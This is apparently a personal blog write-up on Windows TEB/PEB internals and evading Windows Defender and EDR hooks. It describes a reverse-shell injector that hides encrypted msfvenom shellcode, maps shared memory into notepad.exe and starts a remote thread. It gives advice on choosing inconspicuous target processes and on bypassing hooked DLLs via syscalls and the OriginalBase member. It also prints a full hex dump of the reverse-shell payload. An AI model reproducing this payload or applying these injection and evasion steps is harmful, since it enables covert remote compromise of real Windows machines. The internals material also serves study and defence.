AV/EDRs
Now that the theoretical foundation of the Windows architecture is laid out, how do PE files behave at runtime, and how can we abuse them? Depending on the threat protection software in use, such as antivirus (AV) or Endpoint Detection and Response (EDR), the malware might be detected and removed. Threat protection software mainly uses two detection mechanisms: static and dynamic analysis. Static analysis usually covers properties of the file itself, such as its hash and the functions it imports. Dynamic analysis monitors the binary at runtime to determine whether the actions it takes are malicious. For example, WannaCry is a heavily signatured malware specimen whose hash is known to be malicious. However, if even a single line of the source is changed, the hash of the compiled file changes and, by extension, the file is no longer as detectable. This is where dynamic detection comes into play. If some malware injects code into another process and executes it, that can be flagged as malicious activity, since legitimate processes rarely inject code into another process and execute it. Changing how the injection is performed can therefore change how it is detected at runtime. A critical piece in all of this is how AV/EDR engines detect these behaviors and, by extension, how we might avoid detection.
TEB & PEB
When a binary is loaded into memory and run, the resulting process is given a Process Environment Block (PEB), and each of its threads is given a Thread Environment Block (TEB). Together they hold information about the thread and the process, such as which modules (DLLs) are loaded, where they are in memory, whether the process is being debugged, and much more. The TEB is the initial access point to all of this, because it contains a pointer to the PEB. There are a few API calls that can be made to access the TEB, but under the hood, they all do the same thing.
At the lowest level, on x64 the gs segment register holds the base address of the current thread's TEB. Thus, a reference to gs:[0x00] in assembly lands at the start of the struct.
The TEB struct is defined in the winternl.h header file. However, most of it is undocumented (this is why most of the members are named Reserved). For the purposes of this article, the official header file definition will do just fine, and appears below:
```c
typedef struct _TEB {
    PVOID Reserved1[12];
    PPEB ProcessEnvironmentBlock;
    PVOID Reserved2[399];
    BYTE Reserved3[1952];
    PVOID TlsSlots[64];
    BYTE Reserved4[8];
    PVOID Reserved5[26];
    PVOID ReservedForOle; // Windows 2000 only
    PVOID Reserved6[4];
    PVOID TlsExpansionSlots;
} TEB, *PTEB;
```
Notice the second member, which is the pointer to the PEB. On x64 it sits at an offset of 0x60 (96 bytes), because the twelve 8-byte pointers in Reserved1 come before it. Because this structure is largely undocumented, like much of the NTAPI, that offset could in principle change between Windows updates. That being said, the PEB's base address can be retrieved in several ways. Under the hood, every method I am aware of comes down to reading gs:[0x60] in assembly. The read goes into the TEB at offset 0x60, which is the member holding the pointer to the PEB.
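The compiler can confirm where the 0x60 comes from. Below is a minimal sketch that assumes a 64-bit target and uses a hypothetical MOCK_TEB_PREFIX struct. The struct copies only the first two members of the winternl.h definition and never touches a real TEB:

```c
#include <assert.h>
#include <stddef.h>

// Opaque stand-in for the PEB; only a pointer to it is needed here.
typedef struct MOCK_PEB MOCK_PEB;

// Hypothetical copy of the first two members of the documented TEB.
typedef struct MOCK_TEB_PREFIX {
    void *Reserved1[12];               // 12 pointers * 8 bytes = 96 bytes on x64
    MOCK_PEB *ProcessEnvironmentBlock; // so this member starts at 96 = 0x60
} MOCK_TEB_PREFIX;

// The arithmetic only holds where pointers are 8 bytes wide.
static_assert(sizeof(void *) == 8, "x64 layout assumed");
static_assert(offsetof(MOCK_TEB_PREFIX, ProcessEnvironmentBlock) == 0x60,
              "PEB pointer should sit at offset 0x60");

// Report the offset of the PEB pointer within the mock TEB prefix.
size_t peb_pointer_offset(void)
{
    return offsetof(MOCK_TEB_PREFIX, ProcessEnvironmentBlock);
}
```

If a future layout inserted another member before the PEB pointer, the static_assert would fail at compile time rather than silently reading the wrong field.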
Development
So how did I create my malware, and what was my methodology? I started by thinking about what I wanted it to do. Because I had not done this before, I decided to start simple and create a basic TCP reverse shell injector. Although this could easily be done with a PowerShell one-liner, I wanted it to be malleable so that any shellcode could be swapped in and it would still work. I also wanted the challenge of bypassing Windows Defender while using a highly signatured payload. The payload I decided to start with was an msfvenom stageless TCP reverse shell. I don't have access to enterprise or higher-end EDRs for testing, so please note that the development and objectives here reflect bypassing Microsoft Defender only.
As mentioned previously, AV/EDR engines rely on both static and dynamic analysis. In my experience, static analysis is the easiest to bypass, using techniques such as encryption. I opted to store my shellcode encrypted in a byte array variable, which means the encrypted bytes live inside the PE file itself. Which section holds them (for example .text, .data, or .rdata) depends on how the array is declared and on the compiler. Encryption usually increases the entropy of the file, which can make it more suspicious to the engines. However, as far as I am aware, Defender doesn't do that kind of deep analysis, so I wasn't concerned in that regard.
The logic of the malware itself is fairly straightforward. Once it's executed, it injects the shellcode into the target process, decrypts it, and runs the payload, which calls back to a remote listener. The first thing it does is hunt for the victim process, which becomes the "proxy" into which the payload is injected. This is done for several reasons, but mainly so that if the EDR catches the shellcode, it won't burn the injector, signature it, and alert on it. Instead, it will alert on the target process holding the malicious shellcode and kill that. In an enterprise environment, the target process should also be one whose normal behavior matches the actions you are taking. For example, injecting a reverse shell into notepad.exe should set off alarm bells, since notepad doesn't normally reach out to other systems; it exists only to create local notes on disk. A quieter, less suspicious choice is explorer.exe, because it is routinely connected to file shares and reaches out to other systems on the network. Even better, what if firefox.exe is running? That would also work, as it is constantly reaching out to the internet. In the wild, it is best to manually review the processes currently running on the system and see which ones fit your use case. For my proof of concept, I elected to use notepad.exe as the target process because it makes the malware's behavior easy to control, debug, and demonstrate. Because it is more suspicious, it is also a good way to showcase this process (given that this is for educational purposes).
Once it finds the target process, it creates a memory mapping shared between itself and the target. Effectively, this means that any change made in the specified memory region is visible in both processes. Think of it like a symlink between directories in the file system, except that instead of directories on disk, it is a region of memory. This is done because writing memory into another process is heavily monitored and signatured. For example, using the VirtualAllocEx WinAPI function (which allocates a memory region within a target process) to inject a malicious payload will get caught most of the time, because it has been used for malicious purposes too many times. For this reason, even with encryption, Defender will potentially scan every change made to that memory region. As mentioned above, processes should seldom be injecting code into other processes and executing it. I found that a way around this scrutiny is to map the same region into both processes, which gives me effectively shared memory that I can work on from my own process. I do this before decrypting the shellcode because the new memory region is zeroed out when it is allocated. Therefore, if the memory is scanned at that point, it looks benign, containing nothing but zeros.
Now that the region for the shellcode is allocated and mapped, I am able to decrypt the shellcode. Windows Defender (and other EDRs) usually scan memory when changes occur, which is why it matters that the new region starts out zeroed. Scanning is especially likely when data is written from one process's memory into another's, because the write isn't local to the current process. However, because of the mapped region, I can decrypt and copy the shellcode locally into the mapped memory without having to touch the target process directly. It is fairly normal for a process to manipulate its own memory, so Defender usually won't scrutinize it closely. Once the shellcode is copied, the target process contains it, and all that is left is to execute it.
Execution uses a simple call to create a new thread in the target process. Instead of starting the thread at its intended start address, I specify the base address of the mapped memory holding the shellcode. This starts execution of the injected shellcode and, therefore, gives me a callback to my listener for the reverse shell.
To make sure it wasn't a one-off (or that something strange hadn't happened), I executed it multiple times and got the same result each time. I also created an executable version of the payload with msfvenom, and as soon as it touched the disk, it got caught. These results suggest that the method is valid and that my injector successfully bypassed Windows Defender!
Here is a quick proof of concept demo to show the malware in action:
The Windows box is fully up to date, and as you can see, no threats were detected. Defender did not alert on or pick up any malicious activity, even though the shellcode was executed and produced a successful callback to the remote listener. Let's go a bit deeper with memory analysis and observe the shellcode in a live memory dump:
Notice the first few bytes of the payload. They are important because the byte sequence fc 48 83 e4 is a well-known signature of msfvenom x64 payloads, which usually start this way or in some similar form. In other words, the injection succeeded and Defender was bypassed even with a known malicious signature sitting in memory. The rest of the payload follows in the mapped memory region, and it matches the original shellcode that was generated before being encrypted and loaded into the malware:
┌──(kali㉿kali)-[~]
└─$ xxd byte.bin
00000000: fc48 83e4 f0e8 c000 0000 4151 4150 5251 .H........AQAPRQ
00000010: 5648 31d2 6548 8b52 6048 8b52 1848 8b52 VH1.eH.R`H.R.H.R
00000020: 2048 8b72 5048 0fb7 4a4a 4d31 c948 31c0 H.rPH..JJM1.H1.
00000030: ac3c 617c 022c 2041 c1c9 0d41 01c1 e2ed .<a|., A...A....
00000040: 5241 5148 8b52 208b 423c 4801 d08b 8088 RAQH.R .B<H.....
00000050: 0000 0048 85c0 7467 4801 d050 8b48 1844 ...H..tgH..P.H.D
00000060: 8b40 2049 01d0 e356 48ff c941 8b34 8848 .@ I...VH..A.4.H
00000070: 01d6 4d31 c948 31c0 ac41 c1c9 0d41 01c1 ..M1.H1..A...A..
00000080: 38e0 75f1 4c03 4c24 0845 39d1 75d8 5844 8.u.L.L$.E9.u.XD
00000090: 8b40 2449 01d0 6641 8b0c 4844 8b40 1c49 .@$I..fA..HD.@.I
000000a0: 01d0 418b 0488 4801 d041 5841 585e 595a ..A...H..AXAX^YZ
000000b0: 4158 4159 415a 4883 ec20 4152 ffe0 5841 AXAYAZH.. AR..XA
000000c0: 595a 488b 12e9 57ff ffff 5d49 be77 7332 YZH...W...]I.ws2
000000d0: 5f33 3200 0041 5649 89e6 4881 eca0 0100 _32..AVI..H.....
000000e0: 0049 89e5 49bc 0200 115c c0a8 7c80 4154 .I..I....\..|.AT
000000f0: 4989 e44c 89f1 41ba 4c77 2607 ffd5 4c89 I..L..A.Lw&...L.
00000100: ea68 0101 0000 5941 ba29 806b 00ff d550 .h....YA.).k...P
00000110: 504d 31c9 4d31 c048 ffc0 4889 c248 ffc0 PM1.M1.H..H..H..
00000120: 4889 c141 baea 0fdf e0ff d548 89c7 6a10 H..A.......H..j.
00000130: 4158 4c89 e248 89f9 41ba 99a5 7461 ffd5 AXL..H..A...ta..
00000140: 4881 c440 0200 0049 b863 6d64 0000 0000 H..@...I.cmd....
00000150: 0041 5041 5048 89e2 5757 574d 31c0 6a0d .APAPH..WWWM1.j.
00000160: 5941 50e2 fc66 c744 2454 0101 488d 4424 YAP..f.D$T..H.D$
00000170: 18c6 0068 4889 e656 5041 5041 5041 5049 ...hH..VPAPAPAPI
00000180: ffc0 4150 49ff c84d 89c1 4c89 c141 ba79 ..API..M..L..A.y
00000190: cc3f 86ff d548 31d2 48ff ca8b 0e41 ba08 .?...H1.H....A..
000001a0: 871d 60ff d5bb f0b5 a256 41ba a695 bd9d ..`......VA.....
000001b0: ffd5 4883 c428 3c06 7c0a 80fb e075 05bb ..H..(<.|....u..
000001c0: 4713 726f 6a00 5941 89da ffd5 G.roj.YA....
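A byte signature such as fc 48 83 e4 is simply a fixed sequence that a scanner looks for in a file or memory region. The toy exact-match scanner below illustrates the idea. find_signature is a hypothetical helper, and real AV engines use far more sophisticated matching than a single memcmp loop:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

// Toy static-signature check: return the offset of the first occurrence of
// `sig` inside `buf`, or -1 if it never appears. This only illustrates an
// exact byte-pattern match, not how any real engine is implemented.
long find_signature(const unsigned char *buf, size_t buf_len,
                    const unsigned char *sig, size_t sig_len)
{
    if (sig_len == 0 || sig_len > buf_len)
        return -1;
    // Slide a window of sig_len bytes across the buffer.
    for (size_t i = 0; i + sig_len <= buf_len; i++) {
        if (memcmp(buf + i, sig, sig_len) == 0)
            return (long)i;
    }
    return -1;
}
```

Searching a region for the four bytes fc 48 83 e4 returns the offset where they begin, and returns -1 if any byte differs.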
EDR Evasion
With the knowledge presented thus far, there are a few theoretical ways to improve this malware so that it bypasses high-end and enterprise EDRs. Although I don't cover every possible approach, the following are a couple that I researched and learned about over the course of this project.
Some EDRs work by hooking a plethora of commonly used DLLs and proxying calls to their functions through the EDR's engine, which in turn performs correlation analysis to determine whether there is any malicious activity. Both of the techniques below aim to reach the original DLL functions, thereby bypassing the hooked versions.
The first technique builds on how the WinAPI works, as described in the previous article. Calling the documented WinAPI function will get caught by the EDR's hook. Instead, calling the NTAPI version from ntdll.dll could potentially avoid some detection (although most EDRs now hook ntdll.dll as well). Directly invoking the syscall would be even better, because the call transitions straight into the kernel without passing through any DLL, thus bypassing the hooked functions.
A second way to bypass the hook is through the PEB. Specifically, a few members within the PEB provide information useful for calling the original function. Grabbing a specific member gives a pointer to the base address of the DLL without the hook in place. To do this, there are a few extra things to know, such as how to grab the TEB in the first place.
```c
struct _TEB
{
    struct _NT_TIB NtTib;                                  //0x0
    VOID* EnvironmentPointer;                              //0x38
    struct _CLIENT_ID ClientId;                            //0x40
    VOID* ActiveRpcHandle;                                 //0x50
    VOID* ThreadLocalStoragePointer;                       //0x58
    struct _PEB* ProcessEnvironmentBlock;                  //0x60
    ULONG LastErrorValue;                                  //0x68
    ULONG CountOfOwnedCriticalSections;                    //0x6c
    VOID* CsrClientThread;                                 //0x70
    VOID* Win32ThreadInfo;                                 //0x78
    ULONG User32Reserved[26];                              //0x80
    ULONG UserReserved[5];                                 //0xe8
    VOID* WOW32Reserved;                                   //0x100
    ULONG CurrentLocale;                                   //0x108
    ULONG FpSoftwareStatusRegister;                        //0x10c
    VOID* ReservedForDebuggerInstrumentation[16];          //0x110
    VOID* SystemReserved1[25];                             //0x190
    VOID* HeapFlsData;                                     //0x258
    ULONGLONG RngState[4];                                 //0x260
    CHAR PlaceholderCompatibilityMode;                     //0x280
    UCHAR PlaceholderHydrationAlwaysExplicit;              //0x281
    CHAR PlaceholderReserved[10];                          //0x282
    ULONG ProxiedProcessId;                                //0x28c
    ............
};
```
If you want to get the base address of the TEB, you have to do it in a roundabout way. Specifically, the first member of the TEB is a Thread Information Block (TIB) struct. This struct contains information about the current thread as shown below:
```c
struct _NT_TIB64
{
    ULONGLONG ExceptionList;                               //0x0
    ULONGLONG StackBase;                                   //0x8
    ULONGLONG StackLimit;                                  //0x10
    ULONGLONG SubSystemTib;                                //0x18
    union
    {
        ULONGLONG FiberData;                               //0x20
        ULONG Version;                                     //0x20
    };
    ULONGLONG ArbitraryUserPointer;                        //0x28
    ULONGLONG Self;                                        //0x30
};
```
The Self member holds a pointer to the base address of the TEB itself. In other words, the last member of the TEB's first member gives us the base address of the TEB struct. The offset from the beginning of the TEB to that member is 0x30, so referencing gs:[0x30] in assembly returns the address at which the TEB is located. In C, a call to the MSVC intrinsic __readgsqword(0x30) does just that and returns the base address of the TEB. To get the PEB instead, which sits at an offset of 0x60, adjust the call to __readgsqword(0x60).
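To see why reading offset 0x30 yields the TEB's own address, a portable sketch can mimic the round trip. MOCK_NT_TIB64 and read_qword_at are hypothetical names, and the FiberData/Version union is flattened into one 8-byte field. read_qword_at only imitates what __readgsqword(0x30) does relative to the GS base on real x64 Windows. Nothing here reads an actual TEB, so it compiles and runs anywhere:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Hypothetical mock of the _NT_TIB64 layout shown above. The FiberData/Version
// union is flattened into one 8-byte field because only the offsets matter.
typedef struct MOCK_NT_TIB64 {
    uint64_t ExceptionList;        // 0x00
    uint64_t StackBase;            // 0x08
    uint64_t StackLimit;           // 0x10
    uint64_t SubSystemTib;         // 0x18
    uint64_t FiberData;            // 0x20 (union with ULONG Version)
    uint64_t ArbitraryUserPointer; // 0x28
    uint64_t Self;                 // 0x30: address of the structure itself
} MOCK_NT_TIB64;

static_assert(offsetof(MOCK_NT_TIB64, Self) == 0x30, "Self should sit at 0x30");

// Hypothetical stand-in for a GS-relative load such as __readgsqword(offset):
// read the 8 bytes located `offset` bytes past `base`.
uint64_t read_qword_at(const void *base, size_t offset)
{
    uint64_t value;
    memcpy(&value, (const unsigned char *)base + offset, sizeof value);
    return value;
}
```

If Self is filled with the struct's own address, reading offset 0x30 returns that same address. This mirrors the round trip gs:[0x30] performs on a real thread. On x64 Windows itself, NtCurrentTeb() returns the same pointer.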
The PEB member we need is called Ldr, and it is a pointer to a PEB_LDR_DATA structure. The Ldr, or "loader" data, is a struct that holds information pertinent to the DLLs loaded for the process. Both structs can be found below:
```c
typedef struct _PEB {
    BYTE Reserved1[2];
    BYTE BeingDebugged;
    BYTE Reserved2[1];
    PVOID Reserved3[2];
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID Reserved4[3];
    PVOID AtlThunkSListPtr;
    PVOID Reserved5;
    ULONG Reserved6;
    PVOID Reserved7;
    ULONG Reserved8;
    ULONG AtlThunkSListPtr32;
    PVOID Reserved9[45];
    BYTE Reserved10[96];
    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE Reserved11[128];
    PVOID Reserved12[1];
    ULONG SessionId;
} PEB, *PPEB;

typedef struct _PEB_LDR_DATA {
    BYTE Reserved1[8];
    PVOID Reserved2[3];
    LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
```
Within the Ldr there is a doubly linked list called InMemoryOrderModuleList, of type LIST_ENTRY. Because it is a doubly linked list, each LIST_ENTRY contains only two members: Flink and Blink. The former is a pointer to the next entry in the list, while the latter is a pointer to the previous entry. My assumption is they mean "forward link" and "backward link" respectively.
The LIST_ENTRY structure definition is held in the ntdef.h header file. It is the "template" for doubly linked lists in Windows. However, all it can do is move forwards or backwards through the list; it has no room to store any information. To attach information to each node, the LIST_ENTRY is embedded as a member inside a larger structure (such structs are commonly given an _ENTRY suffix), which then serves as the list's element type. Microsoft has done this for InMemoryOrderModuleList with _LDR_DATA_TABLE_ENTRY, whose InMemoryOrderLinks member is the embedded LIST_ENTRY. The structs can be seen below:
```c
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;

typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID Reserved3[2];
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
#pragma warning(push)
#pragma warning(disable: 4201) // we'll always use the Microsoft compiler
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    } DUMMYUNIONNAME;
#pragma warning(pop)
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
```
The InMemoryOrderModuleList member is the head of a doubly linked list of LIST_ENTRY structures. Each link points to the InMemoryOrderLinks member embedded inside an LDR_DATA_TABLE_ENTRY, not to the start of that struct, which is why code walking the list uses CONTAINING_RECORD to recover the entry. Each entry holds information about one module loaded in the process, so every required DLL has an LDR_DATA_TABLE_ENTRY of its own. The two members to note are DllBase and FullDllName. The former is where the DLL is located in the process's memory, and the latter is the DLL's full name. To get the base address of a specific DLL this way, we have to loop through the list and compare the name we want against the name member. Once a match is found, its DllBase member gives the base address.
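The loop just described can be sketched portably under some simplifying assumptions. The key step is CONTAINING_RECORD: the links point at InMemoryOrderLinks rather than at the start of each entry, so the walk must step back by that member's offset. MOCK_LDR_ENTRY and link_tail are hypothetical, and the name is a plain char * rather than a UNICODE_STRING. The CONTAINING_RECORD macro is re-declared here with the same semantics as the Windows one, and the base addresses are made-up values. A real walk would also compare only the file-name part of FullDllName (which holds a full path) and would compare case-insensitively on wide strings. The strcmp below does neither:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct LIST_ENTRY {
    struct LIST_ENTRY *Flink;
    struct LIST_ENTRY *Blink;
} LIST_ENTRY;

// Same idea as the Windows CONTAINING_RECORD macro: step back from the address
// of an embedded member to the start of the structure that holds it.
#define CONTAINING_RECORD(address, type, field) \
    ((type *)((char *)(address) - offsetof(type, field)))

// Hypothetical, simplified stand-in for LDR_DATA_TABLE_ENTRY. As in the real
// struct, the links are not the first member, so node address != entry address.
typedef struct MOCK_LDR_ENTRY {
    void *Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    uintptr_t DllBase;
    const char *DllName; // real entries use UNICODE_STRING FullDllName
} MOCK_LDR_ENTRY;

// Hypothetical helper: append a mock entry's embedded node to the list.
void link_tail(LIST_ENTRY *head, MOCK_LDR_ENTRY *mod)
{
    LIST_ENTRY *node = &mod->InMemoryOrderLinks;
    node->Flink = head;
    node->Blink = head->Blink;
    head->Blink->Flink = node;
    head->Blink = node;
}

// Walk the circular list and return the DllBase of the first entry whose
// name matches, or 0 if no entry does.
uintptr_t find_module_base(LIST_ENTRY *head, const char *name)
{
    for (LIST_ENTRY *node = head->Flink; node != head; node = node->Flink) {
        MOCK_LDR_ENTRY *mod = CONTAINING_RECORD(node, MOCK_LDR_ENTRY, InMemoryOrderLinks);
        if (strcmp(mod->DllName, name) == 0)
            return mod->DllBase;
    }
    return 0;
}
```

Linking a mock notepad.exe entry first and a mock ntdll.dll entry second reproduces the ordering seen in the debugger below. head.Flink then leads back, through CONTAINING_RECORD, to the executable's entry.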
However, some EDRs (specifically SentinelOne (S1), as of the date of this article) modify the DllBase member of the DLLs they are monitoring and change it to their own. This is important because most hooks don't take place this deep within the process. There is an undocumented member of the LDR_DATA_TABLE_ENTRY struct that could bypass the hooked member and give the clean base address of the specified DLL. This member is called OriginalBase and is at an offset of 0xf8 (on x64).
For example, walking through it in the WinDbg debugger, I can start by finding the PEB and, by extension, the Ldr:
Clicking into the Ldr shows the member I mentioned before, InMemoryOrderModuleList:
Clicking into the list once more shows the LIST_ENTRY struct with its Flink and Blink members. The addresses to their right are their pointers to the neighboring LDR_DATA_TABLE_ENTRY structs:
The first entry in the linked list always describes the process's own executable, which in this case is notepad.exe. To show that, take the address the Flink is pointing to and look at the LDR_DATA_TABLE_ENTRY for it:
As seen in the FullDllName member, the first link in the list is notepad.exe, which corresponds to the current process the PEB is describing. To get to the DLLs, click the Flink again to move one position along the list. The pointer now points to the first DLL loaded within the process, which is usually ntdll.dll:
Notice how the address changed. Take the new address and show the LDR_DATA_TABLE_ENTRY for it:
The FullDllName is now ntdll.dll, which means we are in the entry for ntdll. As mentioned, the DllBase member shows the current base address of the DLL. At the bottom, at offset 0xf8, the OriginalBase member appears as well. The values seem different at first, but that is only because DllBase is typed as a pointer while OriginalBase is a plain 64-bit integer value, so the debugger displays them differently.
Since I don't have S1 to test against, I experimented with how this member works, and it gave me the same address as the DllBase member. I have no way to prove or disprove this theory, but testing suggests it could work. Because the member is undocumented (it does not appear in the winternl.h definition), I had to read it by its offset rather than by member name.
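Reading a member that the public header does not declare comes down to pointer arithmetic on the entry's address. A portable sketch with hypothetical FULL_ENTRY and PUBLIC_ENTRY types shows the pattern. The public view stops early, so the extra field can only be reached by its byte offset, mirroring how the PoC reads 0xf8. The layouts and values are invented for illustration and are not the real LDR_DATA_TABLE_ENTRY:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Hypothetical "full" layout, standing in for what is actually in memory.
typedef struct FULL_ENTRY {
    uint64_t Documented1;
    uint64_t Documented2;
    uint64_t Undocumented; // not declared in the public view below
} FULL_ENTRY;

// Hypothetical "public" view that stops early, like the reserved-padded
// winternl.h definitions, so Undocumented cannot be reached by name.
typedef struct PUBLIC_ENTRY {
    uint64_t Documented1;
    uint64_t Documented2;
} PUBLIC_ENTRY;

// Read an 8-byte field at a raw byte offset from the start of the entry.
// memcpy avoids alignment and aliasing problems with the cast pointer.
uint64_t read_field_at(const PUBLIC_ENTRY *entry, size_t offset)
{
    uint64_t value;
    memcpy(&value, (const unsigned char *)entry + offset, sizeof value);
    return value;
}
```

Only the offset has to be correct. If it is wrong, the read quietly returns a neighboring field, which is the main risk of relying on undocumented offsets across Windows versions.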
The PoC code snippet I used to read OriginalBase is shown below. The same code was used for DllBase, with an offset of 0x30 instead of 0xf8:
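```c
#include <windows.h>
#include <winternl.h>
// Hypothetical wrapper; pDataTableEntry is a PLIST_ENTRY from InMemoryOrderModuleList
HMODULE GetOriginalBase(PLIST_ENTRY pDataTableEntry)
{
    // Step back from the embedded InMemoryOrderLinks node to the start of the entry
    LDR_DATA_TABLE_ENTRY* mod = CONTAINING_RECORD(pDataTableEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    size_t offset = 0xf8; // OriginalBase (undocumented, x64); 0x30 gives DllBase
    UINT8* pBase = (UINT8*)mod;
    return *(HMODULE*)(pBase + offset);
}
```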
The output of the addresses is as follows:
DllBase: 0x00007FF959AF0000
OriginalBase: 0x00007FF959AF0000
The fact that they are the same suggests that both point to the same good, clean copy of the DLL. From what I understand, however, OriginalBase will always point to the "original" one, whereas DllBase can be manipulated by EDRs like S1. If I am wrong or there is a flaw in my research, please let me know!